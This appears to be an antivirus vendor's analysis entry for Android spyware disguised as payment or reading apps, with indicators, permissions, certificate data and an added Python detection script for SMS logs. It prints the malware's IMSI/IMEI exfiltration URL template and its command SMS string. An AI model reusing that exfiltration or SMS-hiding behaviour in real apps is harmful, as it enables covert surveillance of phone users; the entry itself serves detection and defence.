Android/MSNewsSpy.A!tr.spy

Analysis

Android/MSNewsSpy.A!tr.spy is a piece of malware targeting Android mobile phones.
The malicious package comes disguised as a mobile payment or reading application; in the background, however, it spies on incoming SMS messages. It selectively hides incoming SMS from certain phone numbers. Additionally, SMS messages starting with certain codes are hidden, and an SMS is sent back to a fixed number in the background. Finally, it sends the phone's IMSI and IMEI to a server.

Technical details
The main application can be called "塔读" or "Mobile Payment" or "流声机" and comes in packages named "com.tadu.android", "com.polyvi.cupmpbasic" or "com.tom.music.fm".
Some of the application icons are shown below.
Fig: Application icons
Apart from the application's legitimate functions, the package contains a receiver, MSNewsReciever (misspelt in the code), that is launched whenever the phone is rebooted, an SMS is received, or a phone call is made or received. It also contains a service, MSNewsService. These two components perform the following malicious functions:
When the application is launched, an HTTP request is sent to

"hxxp://[REMOVED].cn/mg/vrs?uid=" + g.c + "&imsi=" + [Device_IMSI] + "&imei=" + [Device_IMEI] +
 "&ver=a1024" + "&bi=1158" + ">=" + [UA] + "&gs=" + [GLOBAL]
where UA and GLOBAL are obtained from a package configuration file.
Next, the malware spies on incoming SMS messages. All incoming SMS from the following numbers are hidden:
  • 10658007
  • 10659190
  • 10655555
Additionally, SMS messages received that contain text starting with "!#10:", "!#16:", "!#20:" or "!#30:" are hidden.
If the received SMS body starts with "!#10:", all existing SMS messages from the sender's phone number are permanently deleted from the phone. Then, in the background, an SMS is sent to 13823308135 with the contents:
!#10:va1054#d2054#t0#m310260000000000#s-1#r-1#i0#
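The SMS handling described above, turned into an added detection check (this is not Fortinet's or the malware's code): it parses a constructed SMS log in a hypothetical "dir=/peer=/body=" format and tags each event with the behaviours the analysis attributes to the malware, so the indicators can be spotted in device or gateway logs.

```python
import re
from dataclasses import dataclass

# Indicators taken from the analysis above.
HIDDEN_SENDERS = {"10658007", "10659190", "10655555"}
HIDDEN_PREFIXES = ("!#10:", "!#16:", "!#20:", "!#30:")
DELETE_PREFIX = "!#10:"          # also wipes the sender's history and triggers a reply
OUTBOUND_NUMBER = "13823308135"  # recipient of the hidden background reply

# Constructed log format (hypothetical): "<date> <time> dir=<in|out> peer=<number> body=<text>"
LOG_RE = re.compile(r"^(?P<ts>\S+ \S+) dir=(?P<dir>in|out) peer=(?P<peer>\d+) body=(?P<body>.*)$")

@dataclass
class SmsEvent:
    ts: str
    direction: str  # "in" for received, "out" for sent
    peer: str       # sender for "in", recipient for "out"
    body: str

def parse_log(text):
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            events.append(SmsEvent(m["ts"], m["dir"], m["peer"], m["body"]))
    return events

def classify(ev):
    """Map one SMS event to the MSNewsSpy behaviours described above.
    'hide'   : incoming message suppressed from the user
    'delete' : sender's existing messages wiped, followed by a background reply
    'c2-out' : outgoing message to the hard-coded number (the reply itself)"""
    tags = []
    if ev.direction == "in":
        if ev.peer in HIDDEN_SENDERS or ev.body.startswith(HIDDEN_PREFIXES):
            tags.append("hide")
        if ev.body.startswith(DELETE_PREFIX):
            tags.append("delete")
    elif ev.peer == OUTBOUND_NUMBER and ev.body.startswith(DELETE_PREFIX):
        tags.append("c2-out")
    return tags

def scan(text):
    """Return (ts, peer, tags) for every log event that matches an indicator."""
    return [(ev.ts, ev.peer, classify(ev)) for ev in parse_log(text) if classify(ev)]

SAMPLE_LOG = """\
2019-04-12 09:00:01 dir=in peer=10658007 body=Your balance is 12.00
2019-04-12 09:00:05 dir=in peer=13912345678 body=See you at 8
2019-04-12 09:01:10 dir=in peer=13900000000 body=!#16:ping
2019-04-12 09:02:00 dir=in peer=13900000001 body=!#10:va1054#d2054#t0#m310260000000000#s-1#r-1#i0#
2019-04-12 09:02:01 dir=out peer=13823308135 body=!#10:va1054#d2054#t0#m310260000000000#s-1#r-1#i0#
"""

if __name__ == "__main__":
    for ts, peer, tags in scan(SAMPLE_LOG):
        print(ts, peer, ",".join(tags))
```

Of the five constructed log lines, four are flagged; the ordinary message from 13912345678 passes untouched.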

Permissions required by the application:
  • INTERNET
  • READ_PHONE_STATE
  • ACCESS_COARSE_LOCATION
  • ACCESS_NETWORK_STATE
  • WRITE_EXTERNAL_STORAGE
  • MOUNT_UNMOUNT_FILESYSTEMS
  • GET_TASKS
  • RESTART_PACKAGES
  • INSTALL_SHORTCUT
  • CALL_PHONE
  • WRITE_APN_SETTINGS
  • RECEIVE_BOOT_COMPLETED
  • ACCESS_WIFI_STATE
  • CHANGE_WIFI_STATE
  • CHANGE_NETWORK_STATE
  • MODIFY_PHONE_STATE
  • WAKE_LOCK
  • SEND_SMS
  • RECEIVE_SMS
  • READ_SMS
  • WRITE_SMS
  • DEVICE_POWER
  • WRITE_SETTINGS
  • READ_CONTACTS
  • WRITE_CONTACTS

The application is aimed at Chinese users.
Certificate information:
  • Owner: CN=JackSmith, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
  • Issuer: CN=JackSmith, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown
  • Serial number: 4e16565b
  • Valid from: Fri Jul 08 02:59:07 CEST 2011 until: Sat Apr 10 02:59:07 CEST 2066
  • Certificate fingerprints:
      • MD5: 38:E2:24:6C:19:D9:C0:20:F2:96:7B:A2:10:A3:CA:BD
      • SHA1: A3:E1:54:D9:24:8C:00:65:7B:B0:15:63:2B:76:89:FF:18:86:33:3D
  • Signature algorithm name: SHA1withRSA
  • Version: 3

Recommended Action

    FortiGate Systems
  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option.
    FortiClient Systems
  • Quarantine/delete files that are detected and replace infected files with clean backup copies.

Telemetry

Detection Availability

Product: Detection level
FortiClient: Extreme
FortiMail: Extreme
FortiSandbox: Extreme
FortiWeb: Extreme
Web Application Firewall: Extreme
FortiIsolator: Extreme
FortiDeceptor: Extreme
FortiEDR:

Version Updates

Date Version Detail
2019-04-12 67.75300